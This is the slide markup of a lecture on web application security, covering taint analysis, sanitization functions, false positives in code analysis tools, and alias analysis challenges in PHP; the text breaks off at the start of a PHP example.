        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6948216" y="2816932"/>
            <a:ext cx="504152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26" name="直線單箭頭接點 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5400068" y="3789064"/>
            <a:ext cx="576112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27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="2636912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 smtClean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 smtClean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28" name="矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308304" y="3573016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 smtClean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 smtClean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31" name="矩形 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4499992" y="5013176"/>
            <a:ext cx="3960440" cy="864096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Alias Information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2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>must-alias{(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              <a:cs typeface="Calibri" pitchFamily="34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2" name="矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716016" y="4509120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 smtClean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 smtClean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49" name="矩形 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716016" y="350100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 smtClean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 smtClean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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="弧形接點 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6533424" y="2942152"/>
            <a:ext cx="1588" cy="1116124"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18824880"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill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8" name="文字方塊 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="3789040"/>
            <a:ext cx="72008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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alias</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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7" dur="1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8" dur="1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9" dur="1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1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6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34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7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68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1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7" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="49" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="48" grpId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smtClean="0"/>
              <a:t>Detecting Vulnerabilities by Taint Analysis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Build control and data flow graphs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>All inputs from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> are considered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Data that depend on tainted data are also considered tainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Some functions may be designated as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> functions (for particular security vulnerabilities).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Values returned from a sanitization function are considered clean or untainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Report vulnerabilities when tainted values are used in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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37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Problems and Objectives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Three problems (among others) remain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Existing code analysis tools report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>too many false positives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>They rely on the programmer to ensure correctness of sanitization functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Many report </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false negatives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> in some cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Web application languages/frameworks are numerous and hard to catch up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>We aim to solve the first three problems and alleviate the fourth.</a:t>
            </a:r>
          </a:p>
          <a:p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38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4"/>
            <a:ext cx="8401080" cy="839787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Use of a Code Analysis Tool</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3800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Web Application Security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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6015036" y="1584300"/>
            <a:ext cx="21288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TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Analysis results</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="右彎箭號 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6215061" y="1511286"/>
            <a:ext cx="500063" cy="1643062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 375047 w 500062"/>
              <a:gd name="T1" fmla="*/ 0 h 1643062"/>
              <a:gd name="T2" fmla="*/ 375047 w 500062"/>
              <a:gd name="T3" fmla="*/ 250031 h 1643062"/>
              <a:gd name="T4" fmla="*/ 62508 w 500062"/>
              <a:gd name="T5" fmla="*/ 1643062 h 1643062"/>
              <a:gd name="T6" fmla="*/ 500062 w 500062"/>
              <a:gd name="T7" fmla="*/ 125016 h 1643062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0 w 500062"/>
              <a:gd name="T13" fmla="*/ 0 h 1643062"/>
              <a:gd name="T14" fmla="*/ 500062 w 500062"/>
              <a:gd name="T15" fmla="*/ 1643062 h 164306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00062" h="1643062">
                <a:moveTo>
                  <a:pt x="0" y="1643062"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="281285"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="160457"/>
                  <a:pt x="97949" y="62508"/>
                  <a:pt x="218776" y="62508"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="375047" y="62508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500062" y="125016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="250031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375047" y="187523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218777" y="187523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218776" y="187523"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="166993" y="187523"/>
                  <a:pt x="125015" y="229501"/>
                  <a:pt x="125015" y="281284"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125016" y="1643062"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="89A4A7"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000" vert="eaVert" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="右彎箭號 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="2428874" y="3725848"/>
            <a:ext cx="571500" cy="1857375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 428625 w 571500"/>
              <a:gd name="T1" fmla="*/ 0 h 1857375"/>
              <a:gd name="T2" fmla="*/ 428625 w 571500"/>
              <a:gd name="T3" fmla="*/ 285750 h 1857375"/>
              <a:gd name="T4" fmla="*/ 71438 w 571500"/>
              <a:gd name="T5" fmla="*/ 1857375 h 1857375"/>
              <a:gd name="T6" fmla="*/ 571500 w 571500"/>
              <a:gd name="T7" fmla="*/ 142875 h 1857375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0 w 571500"/>
              <a:gd name="T13" fmla="*/ 0 h 1857375"/>
              <a:gd name="T14" fmla="*/ 571500 w 571500"/>
              <a:gd name="T15" fmla="*/ 1857375 h 185737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71500" h="1857375">
                <a:moveTo>
                  <a:pt x="0" y="1857375"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="321469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="183380"/>
                  <a:pt x="111942" y="71438"/>
                  <a:pt x="250030" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="428625" y="71438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571500" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428625" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250031" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250030" y="214313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190850" y="214313"/>
                  <a:pt x="142875" y="262288"/>
                  <a:pt x="142875" y="321468"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="1857375"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="89A4A7"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="右彎箭號 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="5500687" y="4368785"/>
            <a:ext cx="1714500" cy="571500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1571625 w 1714500"/>
              <a:gd name="T1" fmla="*/ 0 h 571500"/>
              <a:gd name="T2" fmla="*/ 1571625 w 1714500"/>
              <a:gd name="T3" fmla="*/ 285750 h 571500"/>
              <a:gd name="T4" fmla="*/ 71438 w 1714500"/>
              <a:gd name="T5" fmla="*/ 571500 h 571500"/>
              <a:gd name="T6" fmla="*/ 1714500 w 1714500"/>
              <a:gd name="T7" fmla="*/ 142875 h 5715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0 w 1714500"/>
              <a:gd name="T13" fmla="*/ 0 h 571500"/>
              <a:gd name="T14" fmla="*/ 1714500 w 1714500"/>
              <a:gd name="T15" fmla="*/ 571500 h 5715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14500" h="571500">
                <a:moveTo>
                  <a:pt x="0" y="571500"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="321469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="183380"/>
                  <a:pt x="111942" y="71438"/>
                  <a:pt x="250030" y="71438"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1571625" y="71438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1714500" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1571625" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250031" y="214313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250030" y="214313"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190850" y="214313"/>
                  <a:pt x="142875" y="262288"/>
                  <a:pt x="142875" y="321468"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142875" y="571500"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="25400" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="89A4A7"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 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4448" y="4021123"/>
            <a:ext cx="1500188" cy="130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文字方塊 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6015036" y="4957748"/>
            <a:ext cx="19859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TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Analysis report</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="右彎箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857374" y="2011348"/>
            <a:ext cx="1636713" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 28558"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst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 dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 1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0811" y="3094033"/>
            <a:ext cx="1441450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le 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6929455" y="2436798"/>
            <a:ext cx="1533507" cy="7858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Manual review</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3626014" y="1357298"/>
            <a:ext cx="18746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 smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code analysis tool</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 24" descr="j028575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901699" y="3013062"/>
            <a:ext cx="1824038" cy="112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 Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785786" y="2655870"/>
            <a:ext cx="9500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 smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Website</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3745335" y="5389548"/>
            <a:ext cx="168392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 smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Review meeting</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文字方塊 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1285852" y="5009937"/>
            <a:ext cx="198598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TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Improvement recommendations</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文字方塊 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="1369988"/>
            <a:ext cx="198598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TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Source code, Web pages</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文字方塊 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="5857892"/>
            <a:ext cx="78459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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: fewer false positives means less workload for the human reviewer.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: there may be possible feedback loops between two tasks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="圖片 24" descr="CANTU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71870" y="1811078"/>
            <a:ext cx="2000264" cy="9286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Challenges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Dynamic features of scripting languages popular for Web application development such as PHP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dynamic typing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dynamic code generation and inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Other difficult language features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Aliases and hash tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Strings and numerical quantities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Interactions between client-side code, server-side code, databases, and system configurations</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Variation in browser and server behaviors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40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In PHP, aliases may be introduced by using the reference operator “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”.</a:t>
            </a:r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  <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW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Challenges: Alias Analysis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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285720" y="2786058"/>
            <a:ext cx="4500594" cy="258532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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
